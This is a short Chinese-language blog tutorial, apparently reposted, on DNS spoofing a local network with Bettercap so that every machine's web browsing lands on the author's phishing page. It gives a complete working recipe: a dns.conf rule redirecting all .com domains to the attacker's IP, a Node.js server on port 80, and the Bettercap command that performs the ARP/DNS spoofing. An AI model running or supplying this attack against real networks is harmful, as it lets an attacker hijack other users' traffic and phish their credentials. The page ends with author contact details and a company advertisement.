bettercap實現內網Dns欺騙


  目的

  讓內網的所有計算機瀏覽網頁的時候, 出現我的釣魚頁面

  准備

  kali系統

  Bettercap

  dns文件

  通過ifconfig查看當前計算機的ip, 我這邊為, 192.168.1.150

  創建一個 dns.conf 文件,下面這個dns語句的意思是:所有的.com結尾的網站全部解析到我的本地Http服務器, .*\.com就是一個正則,也可以是自定義的正則

192.168.1.150  .*\.com

  本地搭建Http服務器

  使用nodeJS搭建一個簡單的服務器, 用apache或者其它工具都可以, 只要能正常訪問80端口都ok, 本機使用nodeJS的express框架, 搭建一個簡單服務器,訪問的時候長這樣:

  或者安裝完nodeJS環境以后, 搭建一個簡易的NodeJS服務器, JS服務代碼如下:

  ser.js

var http = require( 'http' );
var server =http.createServer( function ( request ,response ){
         response.end( 'Hi' );
} );
server.listen( 80 );
console.log( 'HTTP服務器啟動中,端口:80.....' );

  執行 nodejs ser.js

  祭出局域網神器Bettercap

bettercap -X -I wlan0 --dns dns.conf

  -X指監聽, -I指綁定的網卡, --dns指定dns請求的文件

 

  注意

  Bettercap雖然好用,但是無法對https協議就行DNS欺騙, 客戶瀏覽器https協議的頁面的時候, 網頁無法正常查看

  因為客戶機Arp欺騙了,所以瀏覽網頁的時候會很卡, 這個要非常注意

作者: NONO
出處:http://www.cnblogs.com/diligenceday/
企業網站:http://www.idrwl.com/
開源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830 

廈門點燃未來網絡科技有限公司, 是廈門最好的微信應用, 小程序, 微信網站, 公眾號開發公司


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM